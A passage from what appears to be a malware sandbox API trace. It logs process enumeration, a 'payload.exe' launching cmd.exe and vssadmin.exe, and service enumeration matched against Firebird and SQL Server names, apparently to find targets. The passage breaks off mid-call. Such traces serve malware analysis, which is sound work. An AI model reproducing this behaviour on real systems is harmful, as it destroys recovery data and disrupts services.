hSnapshot=0x174, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0036.924] lstrlenW (lpString="svchost.exe") returned 11 [0036.924] Process32NextW (in: hSnapshot=0x174, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0036.925] lstrlenW (lpString="svchost.exe") returned 11 [0036.925] Process32NextW (in: hSnapshot=0x174, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0036.926] lstrlenW (lpString="svchost.exe") returned 11 [0036.926] Process32NextW (in: hSnapshot=0x174, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x27, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0036.926] lstrlenW (lpString="svchost.exe") returned 11 [0036.926] Process32NextW (in: hSnapshot=0x174, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0036.927] lstrlenW (lpString="audiodg.exe") returned 11 [0036.927] Process32NextW (in: hSnapshot=0x174, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0036.928] lstrlenW (lpString="svchost.exe") returned 11 [0036.928] Process32NextW (in: hSnapshot=0x174, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0036.928] lstrlenW (lpString="svchost.exe") returned 11 [0036.928] Process32NextW (in: hSnapshot=0x174, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0036.929] lstrlenW (lpString="dwm.exe") returned 7 [0036.929] Process32NextW (in: hSnapshot=0x174, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0036.930] lstrlenW (lpString="explorer.exe") returned 12 [0036.930] Process32NextW (in: hSnapshot=0x174, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0036.930] lstrlenW (lpString="spoolsv.exe") returned 11 [0036.930] Process32NextW (in: hSnapshot=0x174, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0036.931] lstrlenW (lpString="taskhost.exe") returned 12 [0036.931] Process32NextW (in: hSnapshot=0x174, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0036.932] lstrlenW (lpString="svchost.exe") returned 11 [0036.932] Process32NextW (in: hSnapshot=0x174, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0036.932] lstrlenW (lpString="taskeng.exe") returned 11 [0036.932] Process32NextW (in: hSnapshot=0x174, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0036.933] lstrlenW (lpString="taskhost.exe") returned 12 [0036.933] Process32NextW (in: hSnapshot=0x174, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="carried trinity.exe")) returned 1 [0036.934] lstrlenW (lpString="carried trinity.exe") returned 19 [0036.934] Process32NextW (in: hSnapshot=0x174, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="heaven.exe")) returned 1 [0036.934] lstrlenW (lpString="heaven.exe") returned 10 [0036.934] Process32NextW (in: hSnapshot=0x174, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dell.exe")) returned 1 [0036.935] lstrlenW (lpString="dell.exe") returned 8 [0036.935] Process32NextW (in: hSnapshot=0x174, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="consequence lonely nato.exe")) returned 1 [0036.936] lstrlenW (lpString="consequence lonely nato.exe") returned 27 [0036.936] Process32NextW (in: hSnapshot=0x174, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gotten_commit_philip.exe")) returned 1 [0036.936] lstrlenW (lpString="gotten_commit_philip.exe") returned 24 [0036.936] Process32NextW (in: hSnapshot=0x174, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="til ear equal.exe")) returned 1 [0036.937] lstrlenW (lpString="til ear equal.exe") returned 17 [0036.937] Process32NextW (in: hSnapshot=0x174, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="itunes-bring.exe")) returned 1 [0036.937] lstrlenW (lpString="itunes-bring.exe") returned 16 [0036.938] Process32NextW (in: hSnapshot=0x174, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="tide_instances_ee.exe")) returned 1 [0036.938] lstrlenW (lpString="tide_instances_ee.exe") returned 21 [0036.938] Process32NextW (in: hSnapshot=0x174, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="philadelphia.exe")) returned 1 [0036.939] lstrlenW (lpString="philadelphia.exe") returned 16 [0036.939] Process32NextW (in: hSnapshot=0x174, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="litigation_rows_careers.exe")) returned 1 [0036.939] lstrlenW (lpString="litigation_rows_careers.exe") returned 27 [0036.940] Process32NextW (in: hSnapshot=0x174, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x518, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ict virginia cameras.exe")) returned 1 [0037.398] lstrlenW (lpString="ict virginia cameras.exe") returned 24 [0037.398] Process32NextW (in: hSnapshot=0x174, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x438, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fraud stuck.exe")) returned 1 [0037.398] lstrlenW (lpString="fraud stuck.exe") returned 15 [0037.398] Process32NextW (in: hSnapshot=0x174, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="innovative-essential-very.exe")) returned 1 [0037.399] lstrlenW (lpString="innovative-essential-very.exe") returned 29 [0037.399] Process32NextW (in: hSnapshot=0x174, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="attended.exe")) returned 1 [0037.400] lstrlenW (lpString="attended.exe") returned 12 [0037.400] Process32NextW (in: hSnapshot=0x174, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="tolerance-cartridges.exe")) returned 1 [0037.400] lstrlenW (lpString="tolerance-cartridges.exe") returned 24 [0037.400] Process32NextW (in: hSnapshot=0x174, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pan physician.exe")) returned 1 [0037.401] lstrlenW (lpString="pan physician.exe") returned 17 [0037.401] Process32NextW (in: hSnapshot=0x174, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="yesterday_sagem_indexes.exe")) returned 1 [0037.402] lstrlenW (lpString="yesterday_sagem_indexes.exe") returned 27 [0037.402] Process32NextW (in: hSnapshot=0x174, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="graphsheadlinehull.exe")) returned 1 [0037.402] lstrlenW (lpString="graphsheadlinehull.exe") returned 22 [0037.402] Process32NextW (in: hSnapshot=0x174, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="over-celebrity.exe")) returned 1 [0037.403] lstrlenW (lpString="over-celebrity.exe") returned 18 [0037.403] Process32NextW (in: hSnapshot=0x174, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0037.404] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0037.404] Process32NextW (in: hSnapshot=0x174, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0037.404] lstrlenW (lpString="dllhost.exe") returned 11 [0037.404] Process32NextW (in: hSnapshot=0x174, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x944, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0037.405] lstrlenW (lpString="dllhost.exe") returned 11 [0037.405] Process32NextW (in: hSnapshot=0x174, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x964, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="payload.exe")) returned 1 [0037.406] lstrlenW (lpString="payload.exe") returned 11 [0037.406] Process32NextW (in: hSnapshot=0x174, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x970, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x964, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0037.406] lstrlenW (lpString="cmd.exe") returned 7 [0037.406] Process32NextW (in: hSnapshot=0x174, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x988, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0037.407] lstrlenW (lpString="conhost.exe") returned 11 [0037.407] Process32NextW (in: hSnapshot=0x174, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x970, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0037.408] lstrlenW (lpString="vssadmin.exe") returned 12 [0037.409] Process32NextW (in: hSnapshot=0x174, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0037.409] lstrlenW (lpString="VSSVC.exe") returned 9 [0037.410] Process32NextW (in: hSnapshot=0x174, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 0 [0037.410] CloseHandle (hObject=0x174) returned 1 [0037.410] Sleep (dwMilliseconds=0x1f4) [0038.330] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x626cf8 [0038.331] EnumServicesStatusExW (in: hSCManager=0x626cf8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0) returned 0 [0038.332] GetLastError () returned 0xea [0038.332] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x123e) returned 0x6c08c8 [0038.332] EnumServicesStatusExW (in: hSCManager=0x626cf8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x6c08c8, cbBufSize=0x123e, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x6c08c8, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0) returned 1 [0038.333] CloseServiceHandle (hSCObject=0x626cf8) returned 1 [0038.333] lstrlenW (lpString="Appinfo") returned 7 [0038.333] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0038.333] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0038.333] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0038.334] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0038.334] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0038.334] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0038.334] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0038.334] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0038.334] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0038.334] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0038.334] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0038.334] lstrlenW (lpString="AudioSrv") returned 8 [0038.334] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0038.334] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0038.334] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0038.334] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0038.334] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0038.334] lstrlenW (lpString="BFE") returned 3 [0038.334] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0038.334] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0038.334] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0038.334] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0038.334] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0038.334] lstrlenW (lpString="CryptSvc") returned 8 [0038.334] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0038.334] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0038.334] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0038.334] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0038.334] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0038.334] lstrlenW (lpString="CscService") returned 10 [0038.334] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0038.334] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0038.334] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0038.334] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0038.334] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0038.334] lstrlenW (lpString="DcomLaunch") returned 10 [0038.334] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0038.334] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0038.335] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0038.335] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0038.335] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0038.335] lstrlenW (lpString="Dhcp") returned 4 [0038.335] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0038.335] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0038.335] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0038.335] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0038.335] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0038.335] lstrlenW (lpString="Dnscache") returned 8 [0038.335] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0038.335] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0038.335] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0038.335] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0038.335] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0038.335] lstrlenW (lpString="DPS") returned 3 [0038.335] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0038.335] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0038.335] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0038.335] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0038.335] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0038.335] lstrlenW (lpString="eventlog") returned 8 [0038.335] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0038.335] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0038.335] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0038.335] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0038.335] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0038.335] lstrlenW (lpString="EventSystem") returned 11 [0038.335] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0038.335] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0038.335] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0038.335] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0038.335] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0038.335] lstrlenW (lpString="gpsvc") returned 5 [0038.335] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0038.335] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0038.336] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0038.336] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0038.336] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0038.336] lstrlenW (lpString="iphlpsvc") returned 8 [0038.336] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0038.336] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0038.336] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0038.336] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0038.336] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0038.336] lstrlenW (lpString="LanmanServer") returned 12 [0038.336] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0038.336] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0038.336] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0038.336] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0038.336] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0038.336] lstrlenW (lpString="LanmanWorkstation") returned 17 [0038.336] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0038.336] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0038.336] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0038.336] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0038.336] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0038.336] lstrlenW (lpString="lmhosts") returned 7 [0038.336] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0038.336] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0038.336] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0038.336] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0038.336] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0038.336] lstrlenW (lpString="MMCSS") returned 5 [0038.336] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0038.336] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0038.336] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0038.336] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0038.336] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0038.336] lstrlenW (lpString="MpsSvc") returned 6 [0038.336] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0038.336] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0038.337] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0038.337] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0038.337] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0038.337] lstrlenW (lpString="Netman") returned 6 [0038.337] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0038.337] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0038.337] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0038.337] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0038.337] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0038.337] lstrlenW (lpString="netprofm") returned 8 [0038.337] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0038.337] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0038.337] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0038.337] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0038.337] lstrcmpiW 